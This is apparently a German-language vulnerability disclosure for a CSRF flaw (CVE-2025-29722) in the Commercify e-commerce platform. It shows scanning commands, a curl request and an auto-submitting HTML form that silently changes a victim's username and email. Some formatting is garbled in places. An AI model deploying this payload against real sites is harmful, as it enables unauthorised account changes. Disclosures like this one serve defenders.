
Cross-Site Request Forgery (CSRF) in Commercify v1.0
Entdeckt von: David P.S Abraham (alias Davycipher)
CVE-2025-29722 wurde dieser Schwachstelle von der MITRE Corporation zugewiesen.
In Commercify v1.0, einer quelloffenen E-Commerce-Plattform von @yassmittal, wurde eine CSRF-Schwachstelle identifiziert. Die Anwendung verfügt an kritischen Endpunkten wie /update_settings über keine ordnungsgemäßen CSRF-Schutzmechanismen. Dadurch können Angreifer manipulierte Anfragen erstellen, die bei Ausführung von einer anderen Domain Benutzerdaten verändern.
Ein nmap-Scan ergab, dass der Dienst über Port 5173 erreichbar war, was auf einen möglichen Entwicklungsserver hindeutet.
nmap -p 5173 localhost
Anschließend habe ich die Anwendung mit nikto gescannt; dabei wurden folgende Punkte sichtbar:
X-Frame-Options-HeaderAccess-Control-Allow-Origin: *)Bei der Untersuchung der Anwendung vermutete ich aufgrund der Funktionen des Benutzer-Dashboards einen möglichen update_settings-Endpunkt. Ich testete ihn mit:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Obwohl ein 404 Not Found zurückgegeben wurde, kann dieses Verhalten umgebungsabhängig sein. In gültigen Bereitstellungen könnte dies zu einer vollständigen Kontomanipulation führen.
HTML-basierter Angriff zur Ausnutzung der CSRF-Schwachstelle:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite-Cookie-Attribut*)SameSite=Strict oder Lax für Cookies festlegenDavid P.S. Abraham
Alias: Davycipher